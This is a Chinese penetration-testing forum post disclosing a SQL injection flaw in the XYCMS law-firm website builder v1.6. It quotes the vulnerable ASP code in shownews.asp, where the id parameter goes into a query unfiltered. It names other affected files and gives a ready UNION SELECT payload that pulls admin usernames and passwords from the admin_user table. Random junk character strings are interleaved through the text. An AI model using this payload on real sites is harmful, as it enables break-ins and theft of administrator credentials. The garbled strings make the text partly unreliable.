中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
% V+ o7 ?' `+ b; y# W 7 }0 w8 Q- x  D3 ?
淫荡分割线
/ v. c7 f- z! m  F$ d--------------------------------------------------------
' Q; a  t- ]+ S+ G
! i9 W; r$ j0 ^* |# L  u" K审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
" z: }5 x2 O" N7 T- P7 o7 q源码地址:http://down.chinaz.com/soft/29233.htm. t( v0 W3 D$ g0 X% i
. Q+ j8 b9 [. X5 N; f2 ^: B( n% f
漏洞文件:shownews.asp
3 O6 r$ Q; I: y, x. w/ h漏洞代码:7-13行5 F  o) i8 {% w/ ^( m5 P
$ M: h+ C4 W  ]
$ g' x% C* L/ o# T( n) ^$ q
<%
# v& B% i' h+ `2 m4 Hid=request.QueryString("id")
5 F$ p& I" \( j$ |    0 X9 x" |1 I* @* i: P1 \& C! [
set snews=server.createobject("adodb.recordset") 0 g. ?' Z$ E9 r1 ]
exec="select * from [news] where id="&id; Y1 `4 \$ S" t% ~; e, w# E
snews.open exec,conn,1,18 a2 A) ]' T3 Y; x2 D
%>- X$ h! P' f' J0 a. H4 G# M# B
! C# O3 V1 X% S8 I: @% J0 o9 a

% P: [) m2 w+ q/ B* ^" u; v2 T什么过滤都没有  直造成注入
1 M/ v9 C( z4 Q: B& H/ z
! F! _6 p2 Y/ Y* N7 k* e; b注入点:http://127.0.0.1:99/shownews.asp?id=xx
8 D% K7 ]2 p. e# L6 f: |0 |
4 ?) `) I8 w4 }其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找- w% K- Q, w% z/ a

! n9 S" z+ m+ I4 }: E: ^) t
7 p# Q, a0 o% Z; v- G) yexp: union select 1,admin,password,4,5,7 from admin_user7 l5 C4 P2 F. P( c* F4 m
& d+ X8 b, v  @  W8 ^1 S




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2